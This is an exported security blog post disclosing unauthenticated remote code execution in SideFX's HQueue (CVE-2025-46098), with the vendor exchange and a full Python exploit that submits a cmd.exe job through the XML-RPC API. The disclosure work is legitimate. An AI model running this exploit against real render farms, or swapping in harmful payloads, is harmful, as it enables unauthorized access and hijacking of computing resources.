{"id":993,"date":"2025-04-16T06:03:29","date_gmt":"2025-04-16T06:03:29","guid":{"rendered":"https:\/\/zineausa.com\/blog\/?p=993"},"modified":"2026-04-23T04:24:51","modified_gmt":"2026-04-23T04:24:51","slug":"achieving-rce-via-hqueue","status":"publish","type":"post","link":"https:\/\/zineausa.com\/blog\/2025\/04\/achieving-rce-via-hqueue\/","title":{"rendered":"CVE-2025-46098 – Achieving RCE via HQueue"},"content":{"rendered":"\n

On a recent internal penetration test, I ran into something called HQueue (by SideFX), which seems to be some sort of job queueing solution to process workloads. Logo looks something like this:<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

I took a look around the UI and found no authentication which was interesting, and it apparently had a Windows server hooked up in the queue to process the workloads, named “vfx-renderfarm08”.<\/p>\n\n\n\n

I looked at the usual places to find RCE and exploits, but nothing seemed to come up. However, an interesting forum post<\/a> on the vendor’s site mentioned an API.<\/p>\n\n\n\n

This is the quote of interest, by one of the staff “HQueue is currently completely open for good and bad. Anyone that can connect to the HQueue Server can submit jobs to the farm. User authentication is something that’s been on the roadmap for a while but has not been addressed.”<\/em> – rvinluan<\/p>\n\n\n\n

You can’t actually submit a job via the UI, it’s just not possible, there is no page to do so. However, after taking a look at the API docs<\/a>, there is an actual endpoint to do so.<\/p>\n\n\n\n

Achieving RCE<\/h2>\n\n\n\n

Here is the actual exploit code, it will run “whoami” on a Windows host. An actual attacker would probably put some reverse shell on it, or immediately run some crypto mining (especially on a host with a gpu like this). I have submitted a text version to exploit-db (pending their approval and publishing).<\/p>\n\n\n\n

import xmlrpc.client\n\ndef run_remote_command(hqueue_server_address):\n    try:\n        hq = xmlrpc.client.ServerProxy(f\"http:\/\/{hqueue_server_address}:5000\")\n\n        job_spec = {\n            \"name\": \"Test RCE\",\n            \"shell\": \"c:\\\\windows\\\\system32\\\\cmd.exe\",\n            \"command\": (\n                \"whoami\"\n            )\n        }\n\n        pingresult = hq.ping()\n        print(pingresult)\n        jobs_id = hq.newjob(job_spec)\n        print(jobs_id)\n        job = hq.getJob(jobs_id[0], [\"progress\", \"status\"])\n        status = job[\"status\"]\n\n        print(\"The job status is\", status)\n        if status in hq.getRunningJobStatusNames():\n            print(f\"{job['progress'] * 100.0:.2f}% complete\")\n    except ConnectionRefusedError:\n        print(f\"HQueue Server Not Available at {hqueue_server_address}\")\n    except Exception as e:\n        print(f\"An error occurred: {e}\")\n\nif __name__ == \"__main__\":\n    server_address = input(\"Enter the HQUEUE server address (e.g., 10.1.2.3): \")\n    run_remote_command(server_address)<\/code><\/pre>\n\n\n\n
What you would expect after running this code is for a job to appear and be processed by one of the servers in the queue:<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
You also get a nice output for the command you ran, which is extremely useful for attackers.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Disclosures<\/h2>\n\n\n\n
Okay – but what does the vendor say about this?<\/p>\n\n\n\n
I did initially disclose this on April 11th, 2025:<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
I did get an response almost immediately, following the same tune as the forum post earlier where they claimed it was designed to be an open system, with.. unauthenticated RCE as a design?<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Regardless, I think lack of authentication is a design problem (even if it may be implemented one day). You can’t rely on the network layer always, and the IT staff may just not have enough capacity, or just don’t care enough to build an authentication layer on top of hosted software. Unauth RCE is unauth RCE. Therefore, we will go through the process of creating a CVE for this, as the vendor is open to it!<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Update (9\/2\/25) – Mitre has assigned CVE-2025-46098 for this vulnerability, we will be updating the SideFX folks shortly as well!<\/p>\n\n\n\n
\"\"<\/figure>\n","protected":false},"excerpt":{"rendered":"
On a recent internal penetration test, I ran into something called HQueue (by SideFX), which seems to be some sort of job queueing solution to process workloads. Logo looks something like this: I took a look around the UI and found no authentication which was interesting, and it apparently had a Windows server hooked up […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-993","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"yoast_head":"\nCVE-2025-46098 - Achieving RCE via HQueue - Zinea InfoSec Blog<\/title>\n<meta name=\"description\" content=\"How to achieve Unauthenticated RCE via HQueue by SideFX\/Houdini\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zineausa.com\/blog\/2025\/04\/achieving-rce-via-hqueue\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"CVE-2025-46098 - Achieving RCE via HQueue - Zinea InfoSec Blog\" \/>\n<meta property=\"og:description\" content=\"How to achieve Unauthenticated RCE via HQueue by SideFX\/Houdini\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zineausa.com\/blog\/2025\/04\/achieving-rce-via-hqueue\/\" \/>\n<meta property=\"og:site_name\" content=\"Zinea InfoSec Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/zineausa\/\" \/>\n<meta property=\"article:published_time\" content=\"2025-04-16T06:03:29+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-04-23T04:24:51+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2025\/04\/image.png\" \/>\n\t<meta property=\"og:image:width\" content=\"410\" \/>\n\t<meta property=\"og:image:height\" content=\"111\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Zinea\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@ZineaLLC\" \/>\n<meta name=\"twitter:site\" content=\"@ZineaLLC\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Zinea\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2025\\\/04\\\/achieving-rce-via-hqueue\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2025\\\/04\\\/achieving-rce-via-hqueue\\\/\"},\"author\":{\"name\":\"Zinea\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#\\\/schema\\\/person\\\/e3c58d4f0650f7fb571c01fcf836b1d0\"},\"headline\":\"CVE-2025-46098 – Achieving RCE via HQueue\",\"datePublished\":\"2025-04-16T06:03:29+00:00\",\"dateModified\":\"2026-04-23T04:24:51+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2025\\\/04\\\/achieving-rce-via-hqueue\\\/\"},\"wordCount\":441,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2025\\\/04\\\/achieving-rce-via-hqueue\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/04\\\/image.png\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zineausa.com\\\/blog\\\/2025\\\/04\\\/achieving-rce-via-hqueue\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2025\\\/04\\\/achieving-rce-via-hqueue\\\/\",\"url\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2025\\\/04\\\/achieving-rce-via-hqueue\\\/\",\"name\":\"CVE-2025-46098 - Achieving RCE via HQueue - Zinea InfoSec Blog\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2025\\\/04\\\/achieving-rce-via-hqueue\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2025\\\/04\\\/achieving-rce-via-hqueue\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/04\\\/image.png\",\"datePublished\":\"2025-04-16T06:03:29+00:00\",\"dateModified\":\"2026-04-23T04:24:51+00:00\",\"description\":\"How to achieve Unauthenticated RCE via HQueue by SideFX\\\/Houdini\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2025\\\/04\\\/achieving-rce-via-hqueue\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zineausa.com\\\/blog\\\/2025\\\/04\\\/achieving-rce-via-hqueue\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2025\\\/04\\\/achieving-rce-via-hqueue\\\/#primaryimage\",\"url\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/04\\\/image.png\",\"contentUrl\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/04\\\/image.png\",\"width\":410,\"height\":111},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2025\\\/04\\\/achieving-rce-via-hqueue\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"CVE-2025-46098 – Achieving RCE via HQueue\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/\",\"name\":\"Zinea InfoSec Blog\",\"description\":\"Cyber Security Resources\",\"publisher\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#organization\",\"name\":\"Zinea LLC\",\"url\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/05\\\/zinea-square.png\",\"contentUrl\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/05\\\/zinea-square.png\",\"width\":876,\"height\":876,\"caption\":\"Zinea LLC\"},\"image\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/zineausa\\\/\",\"https:\\\/\\\/x.com\\\/ZineaLLC\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#\\\/schema\\\/person\\\/e3c58d4f0650f7fb571c01fcf836b1d0\",\"name\":\"Zinea\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/81f66095634a4c974693824dc72cd0db7c7c44910d60dda2d1bf1be275ee107d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/81f66095634a4c974693824dc72cd0db7c7c44910d60dda2d1bf1be275ee107d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/81f66095634a4c974693824dc72cd0db7c7c44910d60dda2d1bf1be275ee107d?s=96&d=mm&r=g\",\"caption\":\"Zinea\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"CVE-2025-46098 - Achieving RCE via HQueue - Zinea InfoSec Blog","description":"How to achieve Unauthenticated RCE via HQueue by SideFX\/Houdini","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zineausa.com\/blog\/2025\/04\/achieving-rce-via-hqueue\/","og_locale":"en_US","og_type":"article","og_title":"CVE-2025-46098 - Achieving RCE via HQueue - Zinea InfoSec Blog","og_description":"How to achieve Unauthenticated RCE via HQueue by SideFX\/Houdini","og_url":"https:\/\/zineausa.com\/blog\/2025\/04\/achieving-rce-via-hqueue\/","og_site_name":"Zinea InfoSec Blog","article_publisher":"https:\/\/www.facebook.com\/zineausa\/","article_published_time":"2025-04-16T06:03:29+00:00","article_modified_time":"2026-04-23T04:24:51+00:00","og_image":[{"width":410,"height":111,"url":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2025\/04\/image.png","type":"image\/png"}],"author":"Zinea","twitter_card":"summary_large_image","twitter_creator":"@ZineaLLC","twitter_site":"@ZineaLLC","twitter_misc":{"Written by":"Zinea","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zineausa.com\/blog\/2025\/04\/achieving-rce-via-hqueue\/#article","isPartOf":{"@id":"https:\/\/zineausa.com\/blog\/2025\/04\/achieving-rce-via-hqueue\/"},"author":{"name":"Zinea","@id":"https:\/\/zineausa.com\/blog\/#\/schema\/person\/e3c58d4f0650f7fb571c01fcf836b1d0"},"headline":"CVE-2025-46098 – Achieving RCE via HQueue","datePublished":"2025-04-16T06:03:29+00:00","dateModified":"2026-04-23T04:24:51+00:00","mainEntityOfPage":{"@id":"https:\/\/zineausa.com\/blog\/2025\/04\/achieving-rce-via-hqueue\/"},"wordCount":441,"commentCount":0,"publisher":{"@id":"https:\/\/zineausa.com\/blog\/#organization"},"image":{"@id":"https:\/\/zineausa.com\/blog\/2025\/04\/achieving-rce-via-hqueue\/#primaryimage"},"thumbnailUrl":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2025\/04\/image.png","inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zineausa.com\/blog\/2025\/04\/achieving-rce-via-hqueue\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zineausa.com\/blog\/2025\/04\/achieving-rce-via-hqueue\/","url":"https:\/\/zineausa.com\/blog\/2025\/04\/achieving-rce-via-hqueue\/","name":"CVE-2025-46098 - Achieving RCE via HQueue - Zinea InfoSec Blog","isPartOf":{"@id":"https:\/\/zineausa.com\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/zineausa.com\/blog\/2025\/04\/achieving-rce-via-hqueue\/#primaryimage"},"image":{"@id":"https:\/\/zineausa.com\/blog\/2025\/04\/achieving-rce-via-hqueue\/#primaryimage"},"thumbnailUrl":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2025\/04\/image.png","datePublished":"2025-04-16T06:03:29+00:00","dateModified":"2026-04-23T04:24:51+00:00","description":"How to achieve Unauthenticated RCE via HQueue by SideFX\/Houdini","breadcrumb":{"@id":"https:\/\/zineausa.com\/blog\/2025\/04\/achieving-rce-via-hqueue\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zineausa.com\/blog\/2025\/04\/achieving-rce-via-hqueue\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zineausa.com\/blog\/2025\/04\/achieving-rce-via-hqueue\/#primaryimage","url":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2025\/04\/image.png","contentUrl":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2025\/04\/image.png","width":410,"height":111},{"@type":"BreadcrumbList","@id":"https:\/\/zineausa.com\/blog\/2025\/04\/achieving-rce-via-hqueue\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zineausa.com\/blog\/"},{"@type":"ListItem","position":2,"name":"CVE-2025-46098 – Achieving RCE via HQueue"}]},{"@type":"WebSite","@id":"https:\/\/zineausa.com\/blog\/#website","url":"https:\/\/zineausa.com\/blog\/","name":"Zinea InfoSec Blog","description":"Cyber Security Resources","publisher":{"@id":"https:\/\/zineausa.com\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zineausa.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zineausa.com\/blog\/#organization","name":"Zinea LLC","url":"https:\/\/zineausa.com\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zineausa.com\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/05\/zinea-square.png","contentUrl":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/05\/zinea-square.png","width":876,"height":876,"caption":"Zinea LLC"},"image":{"@id":"https:\/\/zineausa.com\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/zineausa\/","https:\/\/x.com\/ZineaLLC"]},{"@type":"Person","@id":"https:\/\/zineausa.com\/blog\/#\/schema\/person\/e3c58d4f0650f7fb571c01fcf836b1d0","name":"Zinea","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/81f66095634a4c974693824dc72cd0db7c7c44910d60dda2d1bf1be275ee107d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/81f66095634a4c974693824dc72cd0db7c7c44910d60dda2d1bf1be275ee107d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/81f66095634a4c974693824dc72cd0db7c7c44910d60dda2d1bf1be275ee107d?s=96&d=mm&r=g","caption":"Zinea"}}]}},"_links":{"self":[{"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/posts\/993","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/comments?post=993"}],"version-history":[{"count":3,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/posts\/993\/revisions"}],"predecessor-version":[{"id":1009,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/posts\/993\/revisions\/1009"}],"wp:attachment":[{"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/media?parent=993"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/categories?post=993"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/tags?post=993"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}